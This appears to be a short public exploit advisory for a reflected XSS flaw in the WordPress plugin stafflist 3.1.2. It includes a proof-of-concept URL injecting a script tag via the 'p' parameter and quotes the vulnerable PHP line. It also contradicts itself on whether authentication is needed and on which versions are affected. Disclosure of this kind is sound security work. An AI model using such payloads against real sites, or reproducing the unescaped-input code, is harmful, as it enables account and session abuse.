# Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Summary:

A cross site scripting reflected vulnerability has been identified in
WordPress Plugin stafflist version less then 3.1.2. that allows
unauthenticated users to run arbitrary javascript code inside
WordPress using Stafflist Plugin.

# POC

http://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

# Vulnerable Parameters

p and s parameters are vulnerable.

# Vulnerable Code:

$html = ($cur > 1 ? "<p class='pager'><a
href='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous
</a></p>" : ""); //<